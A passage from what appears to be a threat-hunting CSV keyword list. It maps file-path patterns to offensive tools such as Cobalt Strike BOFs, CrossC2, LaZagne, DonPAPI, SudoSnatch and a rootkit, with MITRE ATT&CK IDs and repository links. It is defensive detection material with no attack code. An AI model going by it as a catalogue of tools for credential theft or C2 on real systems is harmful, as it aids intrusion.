passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/crlfinjection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*/CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2Kit*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/CrossC2Kit/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2-test*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossNet-Beta/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*/crunch-wordlist/*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/crypt0p3g/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/cs2modrewrite/*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*/CS-BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*/CSExec.py.git*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*/csharp/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/CSharpWinRM*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/C--Shellcode*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*/CS-Loader.go*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/CS-Loader/*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 